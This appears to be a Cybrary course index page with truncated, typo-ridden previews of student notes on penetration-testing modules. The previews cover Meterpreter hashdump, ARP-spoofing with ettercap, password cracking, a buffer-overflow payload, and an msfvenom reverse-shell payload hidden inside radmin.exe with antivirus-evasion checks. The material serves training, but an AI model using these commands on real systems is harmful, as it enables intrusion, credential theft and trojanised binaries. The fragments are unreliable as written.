Advanced Penetration Testing Notes

By: Oishi | Related Course: Advanced Penetration Testing
Join Cybrary

Module 1 - Linux (Click to View Notes)

> nc -lvp 1234 > myfile3> cat myfile3 this is a secret> cd /etc >ls | grep cron>nano crontab (shows list of jobs)> nano cron.daily/  (run daily)> 17 m * h     ***   (= every 17min of every hour of every day)> nano cron [view]


Module 10 - Post Exploitation (Click to View Notes)

Program: smbexec kali: > smbexec.rb > 1 >7> 10.0.0.75> Username > 3> 2> cd  log/smbexec-2014-1>  cd  log/smbexec-2014-12-29/hashes>  opt/smbexec-2014-12-29/hashes# sessions -i 6list tokens -u >getuid> u [view]


Module 10 - Post Exploitation (Click to View Notes)

os> KaliMSF - Metasploit> sessions -1 1>Help> hashdump>upload /usr/share/window-binaries/nc.exe C:\\>cd /usr/share/metasploit-framework/scr metatpreter>run getgui> background> use /post/windows/gather/enum_logged_on_users&g [view]


Module 11 - WebApps (Click to View Notes)

Program: Burpesuite and IceWeasalSends all traffic through the proxyProxy:  Intercept:  onSpider the host  [view]


Module 12 - Exploit Development (Click to View Notes)

 (gdb)  run $(python -c 'print "A" *9 + "B" * 4')(gdb) disassemble  overflowed (gdb)  run $(python -c 'print "A" *9 + "\x 08\x04\x83\xf4"')(gdb) x16xw $esp(gdb) endianess   [view]


Module 2 - Programming (Click to View Notes)

#nano cprogram.c#gcc cprogram.c -o cprogramcprogram.c In function  'main' : cprogram.c:14:3 error: expected ';' before 'return' #nano cprogram.c#gcc cprogram.c -o cprogram#chmod +x cprogramPass your name as an arguement./cprogram GeorgiaHello Geor [view]


Module 3 - Metasploit (Click to View Notes)

>kali linex> cd /usr/share/metesploit-framework/:/use/share/metasploit-framework> cd /root>msfvenom  [view]


Module 4 - Information Gathering (Click to View Notes)

kail>>recon-ng>show modules> use recon/contacts-creds/haveIbeenpwned>set source "email address" > run> exitgoogle dorksbrowser>>>exploit-db.com/google-dorks/   [view]


Module 5 - Vulnerability Discovery/Scanning (Click to View Notes)

Kali> zervit 0.4   web server> http://192.168.1.76:3232  [view]


Module 6 - Traffic Capture (Click to View Notes)

Kaliman in the middle> ettercap -Ti eth0 -M arp:remote /192.168.1.1/ / 192.168.1.76arp spoof out come> nano/proc/sys/net/ipv4/ip_forwardwireshark > filter TLSv1 or HTTPettercap>nano /etc/ettercap/ettercap.com(turn off ipv4)   [view]


Module 7 - Exploitation (Click to View Notes)

 Attaching to  Kaliadditional research on mounting ip address> showmount -e "ipaddress"> mkdir /tmp/name>mount -t nfs "ipaddress:/export/name /tmp/name"> mount -t nfs -o nolock "ipaddress:/export/name /tmp/name>cd /tmp/namecd /tmp/na [view]


Module 8 - Passwords (Click to View Notes)

Program - john the ripper> john> nano hash.txtpasswords.txt> john Desktop/windows7hashes.txt --wordlist=passwords.txt> cd /usr/share/john/>nano password.lstTo add complex passwords, use rules.  [view]


Module 9 - Advanced Exploitation (Click to View Notes)

Os> Kali>ms fvenom -p windows?meterpreter/reverse_tcp LHOST=192.168.1.77 LPORT=1234 -x / usr/share/windows - binaries/ radmin.exe > -k -f exe. radmin.exe>www.virustotal.com > cd Hyperion-1.1/> ideally create own code to a windows A [view]


Join Cybrary

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel